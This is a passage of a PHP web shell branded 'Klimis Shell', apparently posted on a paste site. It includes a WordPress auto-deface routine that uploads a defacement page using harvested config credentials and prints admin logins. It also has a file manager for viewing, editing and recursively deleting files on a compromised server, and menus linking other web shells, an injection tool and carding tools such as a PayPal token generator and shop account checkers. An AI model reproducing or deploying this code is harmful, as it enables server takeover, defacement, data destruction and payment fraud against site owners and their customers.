  2211. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2212. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2213. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2214. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2215. curl_setopt($ch6, CURLOPT_COOKIESESSION,true);
  2216. $postResult = curl_exec($ch6);
  2217. curl_close($ch6);
  2218. $as = "$target/k.php";
  2219. $bs = anucurl($as);
  2220. if(preg_match("#$script#is", $bs)) {
  2221. echo "[+] <font color='#4B0082'>berhasil mepes...</font><br>";
  2222. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2223. } else {
  2224. echo "[-] <font color='red'>gagal mepes...</font><br>";
  2225. echo "[!!] coba aja manual: <br>";
  2226. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2227. echo "[+] username: <font color=#4B0082>$user</font><br>";
  2228. echo "[+] password: <font color=#4B0082>$pass</font><br><br>";
  2229. }
  2230. mysql_close($conn);
  2231. }
  2232. }
  2233. } else {
  2234. echo "<center><h1>WordPress Auto Deface V.2</h1>
  2235. <form method='post'>
  2236. Link Config: <br>
  2237. <textarea name='link' placeholder='http://target.com/idx_config/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  2238. <input type='text' name='script' height='10' size='50' placeholder='Hacked By Mr.Klimis' required><br>
  2239. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2240. </form></center>";
  2241. }
  2242. } elseif($_GET['act'] == 'newfile') {
  2243. if($_POST['new_save_file']) {
  2244. $newfile = htmlspecialchars($_POST['newfile']);
  2245. $fopen = fopen($newfile, "a+");
  2246. if($fopen) {
  2247. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2248. } else {
  2249. $act = "<font color=red>permission denied</font>";
  2250. }
  2251. }
  2252. echo $act;
  2253. echo "<form method='post'>
  2254. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  2255. <input type='submit' name='new_save_file' value='Submit'>
  2256. </form>";
  2257. } elseif($_GET['act'] == 'newfolder') {
  2258. if($_POST['new_save_folder']) {
  2259. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2260. if(!mkdir($new_folder)) {
  2261. $act = "<font color=red>permission denied</font>";
  2262. } else {
  2263. $act = "<script>window.location='?dir=".$dir."';</script>";
  2264. }
  2265. }
  2266. echo $act;
  2267. echo "<form method='post'>
  2268. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2269. <input type='submit' name='new_save_folder' value='Submit'>
  2270. </form>";
  2271. } elseif($_GET['act'] == 'rename_dir') {
  2272. if($_POST['dir_rename']) {
  2273. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2274. if($dir_rename) {
  2275. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2276. } else {
  2277. $act = "<font color=red>permission denied</font>";
  2278. }
  2279. echo "".$act."<br>";
  2280. }
  2281. echo "<form method='post'>
  2282. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2283. <input type='submit' name='dir_rename' value='rename'>
  2284. </form>";
  2285. } elseif($_GET['act'] == 'delete_dir') {
  2286. function Delete($path)
  2287. {
  2288. if (is_dir($path) === true)
  2289. {
  2290. $files = array_diff(scandir($path), array('.', '..'));
  2291. foreach ($files as $file)
  2292. {
  2293. Delete(realpath($path) . '/' . $file);
  2294. }
  2295. return rmdir($path);
  2296. }
  2297. else if (is_file($path) === true)
  2298. {
  2299. return unlink($path);
  2300. }
  2301. return false;
  2302. }
  2303. $delete_dir = Delete($dir);
  2304. if($delete_dir) {
  2305. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2306. } else {
  2307. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2308. }
  2309. echo $act;
  2310. } elseif($_GET['act'] == 'view') {
  2311. echo "Filename: <font color=#4B0082>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2312. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2313. } elseif($_GET['act'] == 'edit') {
  2314. if($_POST['save']) {
  2315. $save = file_put_contents($_GET['file'], $_POST['src']);
  2316. if($save) {
  2317. $act = "<font color=#4B0082>Saved!</font>";
  2318. } else {
  2319. $act = "<font color=red>permission denied</font>";
  2320. }
  2321. echo "".$act."<br>";
  2322. }
  2323. echo "Filename: <font color=#4B0082>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2324. echo "<form method='post'>
  2325. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2326. <input type='submit' value='Save' name='save' style='width: 500px;'>
  2327. </form>";
  2328. } elseif($_GET['act'] == 'rename') {
  2329. if($_POST['do_rename']) {
  2330. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2331. if($rename) {
  2332. $act = "<script>window.location='?dir=".$dir."';</script>";
  2333. } else {
  2334. $act = "<font color=red>permission denied</font>";
  2335. }
  2336. echo "".$act."<br>";
  2337. }
  2338. echo "Filename: <font color=#4B0082>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2339. echo "<form method='post'>
  2340. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2341. <input type='submit' name='do_rename' value='rename'>
  2342. </form>";
  2343. } elseif($_GET['act'] == 'delete') {
  2344. $delete = unlink($_GET['file']);
  2345. if($delete) {
  2346. $act = "<script>window.location='?dir=".$dir."';</script>";
  2347. } else {
  2348. $act = "<font color=red>permission denied</font>";
  2349. }
  2350. echo $act;
  2351. }else {
  2352. if(is_dir($dir) == true) {
  2353. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  2354. <tr>
  2355. <th class="th_home"><center>Name</center></th>
  2356. <th class="th_home"><center>Type</center></th>
  2357. <th class="th_home"><center>Size</center></th>
  2358. <th class="th_home"><center>Last Modified</center></th>
  2359. <th class="th_home"><center>Permission</center></th>
  2360. <th class="th_home"><center>Action</center></th>
  2361. </tr>';
  2362. $scandir = scandir($dir);
  2363. foreach($scandir as $dirx) {
  2364. $dtype = filetype("$dir/$dirx");
  2365. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2366. if(!is_dir("$dir/$dirx")) continue;
  2367. if($dirx === '..') {
  2368. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2369. } elseif($dirx === '.') {
  2370. $href = "<a href='?dir=$dir'>$dirx</a>";
  2371. } else {
  2372. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2373. }
  2374. if($dirx === '.' || $dirx === '..') {
  2375. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2376. } else {
  2377. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2378. }
  2379. echo "<tr>";
  2380. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  2381. echo "<td class='td_home'><center>$dtype</center></td>";
  2382. echo "<td class='td_home'><center>-</center></th>";
  2383. echo "<td class='td_home'><center>$dtime</center></td>";
  2384. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2385. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2386. }
  2387. echo "</tr>";
  2388. foreach($scandir as $file) {
  2389. $ftype = filetype("$dir/$file");
  2390. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2391. $size = filesize("$dir/$file")/1024;
  2392. $size = round($size,3);
  2393. if($size > 1024) {
  2394. $size = round($size/1024,2). 'MB';
  2395. } else {
  2396. $size = $size. 'KB';
  2397. }
  2398. if(!is_file("$dir/$file")) continue;
  2399. echo "<tr>";
  2400. echo "<td class='td_home'><img src='data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAAAXNSR0IArs4c6QAAAAZiS0dEAP8A/wD/oL2nkwAAAAlwSFlzAAALEwAACxMBAJqcGAAAAAd0SU1FB9oJBhcTJv2B2d4AAAJMSURBVDjLbZO9ThxZEIW/qlvdtM38BNgJQmQgJGd+A/MQBLwGjiwH3nwdkSLtO2xERG5LqxXRSIR2YDfD4GkGM0P3rb4b9PAz0l7pSlWlW0fnnLolAIPB4PXh4eFunucAIILwdESeZyAifnp6+u9oNLo3gM3NzTdHR+//zvJMzSyJKKodiIg8AXaxeIz1bDZ7MxqNftgSURDWy7LUnZ0dYmxAFAVElI6AECygIsQQsizLBOABADOjKApqh7u7GoCUWiwYbetoUHrrPcwCqoF2KUeXLzEzBv0+uQmSHMEZ9F6SZcr6i4IsBOa/b7HQMaHtIAwgLdHalDA1ev0eQbSjrErQwJpqF4eAx/hoqD132mMkJri5uSOlFhEhpUQIiojwamODNsljfUWCqpLnOaaCSKJtnaBCsZYjAllmXI4vaeoaVX0cbSdhmUR3zAKvNjY6Vioo0tWzgEonKbW+KkGWt3Unt0CeGfJs9g+UU0rEGHH/Hw/MjH6/T+POdFoRNKChM22xmOPespjPGQ6HpNQ27t6sACDSNanyoljDLEdVaFOLe8ZkUjK5ukq3t79lPC7/ODk5Ga+Y6O5MqymNw3V1y3hyzfX0hqvJLybXFd++f2d3d0dms+qvg4ODz8fHx0/Lsbe3964sS7+4uEjunpqmSe6e3D3N5/N0WZbtly9f09nZ2Z/b29v2fLEevvK9qv7c2toKi8UiiQiqHbm6riW6a13fn+zv73+oqorhcLgKUFXVP+fn52+Lonj8ILJ0P8ZICCF9/PTpClhpBvgPeloL9U55NIAAAAAASUVORK5CYII='><a href='?act=view&dir=$dir&file=$dir/$file'>$file</a></td>";
  2401. echo "<td class='td_home'><center>$ftype</center></td>";
  2402. echo "<td class='td_home'><center>$size</center></td>";
  2403. echo "<td class='td_home'><center>$ftime</center></td>";
  2404. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  2405. echo "<td class='td_home' style='padding-left: 15px;'><a href='?act=edit&dir=$dir&file=$dir/$file'>edit</a> | <a href='?act=rename&dir=$dir&file=$dir/$file'>rename</a> | <a href='?act=delete&dir=$dir&file=$dir/$file'>delete</a> | <a href='?act=download&dir=$dir&file=$dir/$file'>download</a></td>";
  2406. }
  2407. echo "</tr></table>";
  2408. } else {
  2409. echo "<font color=red>can't open directory</font>";
  2410. }
  2411. }
  2412. echo "<center><hr><form>
  2413. <select onchange='if (this.value) window.open(this.value);'>
  2414. <option selected='selected' value=''> Tools Creator </option>
  2415. <option value='$ling=wso'>WSO 2.8.1</option>
  2416. <option value='$ling=injection'>1n73ction v3</option>
  2417. <option value='$ling=wk'>WHMCS Killer</option>
  2418. <option value='$ling=adminer'>Adminer</option>
  2419. <option value='$ling=b374k'>b374k Shell</option>
  2420. <option value='$ling=b374k323'>b374k 3.2</option>
  2421. <option value='$ling=bh'>BlackHat Shell</option>
  2422. <option value='$ling=dhanus'>Dhanush Shell</option>
  2423. <option value='$ling=r57'>R57 Shell</option>
  2424. <option value='$ling=encodedecode'>Encode Decode</option>
  2425. <option value='$ling=r57'>R57 Shell</option>
  2426. </select>
  2427. <select onchange='if (this.value) window.open(this.value);'>
  2428. <option selected='selected' value=''> Tools Carder </option>
  2429. <option value='$ling=extractor'>DB Email Extractor</option>
  2430. <option value='$ling=promailerv2'>Pro Mailer V2</option>
  2431. <option value='$ling=bukalapak'>BukaLapak Checker</option>
  2432. <option value='$ling=tokopedia'>TokoPedia Checker</option>
  2433. <option value='$ling=tokenpp'>Paypal Token Generator</option>
  2434. <option value='$ling=mailer'>Mailer</option>
  2435. <option value='$ling=gamestopceker'>GamesTop Checker</option>
  2436. </select>
  2437. <noscript><input type='submit' value='Submit'></noscript>
  2438. </form>Kudus1337; ".date("Y")." - <a href='http://facebook.com/TahTa404' target='_blank'><font color=#4B0082>Klimis Shell</font></a> </center>";
  2439. ?>
  2440. </html>
Add Comment
Please, Sign In to add comment